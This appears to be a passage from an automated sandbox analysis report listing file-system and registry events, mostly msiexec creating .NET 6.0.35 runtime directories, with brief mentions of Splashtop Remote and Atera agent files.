                                Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                Source: C:\Windows\System32\msiexec.exe File written: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdsmpl.ini
                                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\msquic.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceProcess.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\WindowsBase.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.AccessControl.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebProxy.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Expressions.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.AccessControl.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorlib.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.XDocument.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.UnmanagedMemoryStream.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exe
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to behavior
